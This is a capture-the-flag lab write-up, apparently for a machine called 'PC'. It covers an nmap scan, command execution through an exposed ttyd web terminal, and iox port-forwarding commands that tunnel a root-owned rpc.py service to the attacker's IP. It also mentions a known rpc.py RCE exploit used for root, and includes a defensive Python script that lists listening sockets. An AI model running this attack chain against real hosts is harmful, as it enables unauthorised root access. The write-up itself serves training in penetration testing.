Information gathering:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.210
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-24 18:01 CST
Nmap scan report for 192.168.216.210
Host is up (0.0039s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|     <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html>
|   GetRequest:
|     HTTP/1.0 200 OK
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 677047
|     <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon" type="image/png" href="data:image/png;base64,
|   Socks5, X11Probe:
|     HTTP/1.0 403 Forbidden
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|_    <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html>
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT     ADDRESS
1   3.35 ms 192.168.45.1
2   3.34 ms 192.168.45.254
3   3.70 ms 192.168.251.1
4   9.58 ms 192.168.216.210

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds
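Port 8000 exposes an HTTP service, which is a shell terminal, so RCE is available directly.
Uploading and running linpeas.sh shows a TCP service running on port 65432,
and pspy32s also shows rpc.py running as root, which is probably the service listening on port 65432.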
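From the defender's side, the same two findings (a terminal service listening on all interfaces and a root-owned service bound only to loopback) can be read straight from /proc/net/tcp. The following is an added example, not part of the original write-up; the sample table is constructed, the function names are hypothetical, and the address decoding assumes a little-endian (x86) host and IPv4 only.

```python
import ipaddress

LISTEN = "0A"  # TCP_LISTEN state code as printed in /proc/net/tcp

# Constructed sample in /proc/net/tcp layout (not captured from the target):
# 0.0.0.0:22 owned by uid 0, 0.0.0.0:8000 owned by uid 1000,
# 127.0.0.1:65432 owned by uid 0, plus one ESTABLISHED row that must be ignored.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21001 1 0000000000000000 100 0 0 10 0
   1: 00000000:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 21002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:FF98 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21003 1 0000000000000000 100 0 0 10 0
   3: 0100007F:FF98 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 21004 1 0000000000000000 100 0 0 10 0
"""


def parse_listeners(text):
    """Yield (ip, port, uid, inode) for every socket in LISTEN state."""
    for line in text.splitlines():
        f = line.split()
        # Data rows start with "N:"; the header row and short rows are skipped.
        if len(f) < 10 or not f[0].endswith(":") or f[3] != LISTEN:
            continue
        addr_hex, port_hex = f[1].split(":")
        # The kernel prints the 32-bit address in host byte order, so reverse it.
        ip = ipaddress.IPv4Address(bytes.fromhex(addr_hex)[::-1])
        yield ip, int(port_hex, 16), int(f[7]), int(f[9])


def root_loopback_listeners(text):
    """Root-owned services bound to loopback: unreachable from the network,
    but reachable by any local user, so they need their own authentication."""
    return [(str(ip), port, inode)
            for ip, port, uid, inode in parse_listeners(text)
            if uid == 0 and ip.is_loopback]


def network_listeners(text):
    """Listeners bound to non-loopback addresses, with the owning uid."""
    return [(str(ip), port, uid)
            for ip, port, uid, _ in parse_listeners(text)
            if not ip.is_loopback]


if __name__ == "__main__":
    # On a live host, pass open("/proc/net/tcp").read() instead of SAMPLE.
    print("root loopback listeners:", root_loopback_listeners(SAMPLE))
    print("network listeners:", network_listeners(SAMPLE))
```

The inode in each result can be matched against the socket links under /proc/<pid>/fd to name the owning process.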
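Upload iox for port forwarding.
iox port forwarding (forward port 65432 on the target to port 3333 on the attacking machine):
Run on the attacking machine:
./iox fwd -l *2222 -l 3333 -k 123456
Run on the target (192.168.45.184 is the attacking machine's IP):
./iox fwd -r 127.0.0.1:65432 -r *192.168.45.184:2222 -k 123456
Scan the forwarded port with nmap.
Nothing useful shows up; recalling the rpc.py seen earlier, search for known vulnerabilities.
Use the rpc.py 0.6.0 RCE exploit, changing the script's target and the command it executes.
This yields a root shell.
Then retrieve the proof.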
Originally published on the WeChat official account EuSRC安全实验室: PG_PC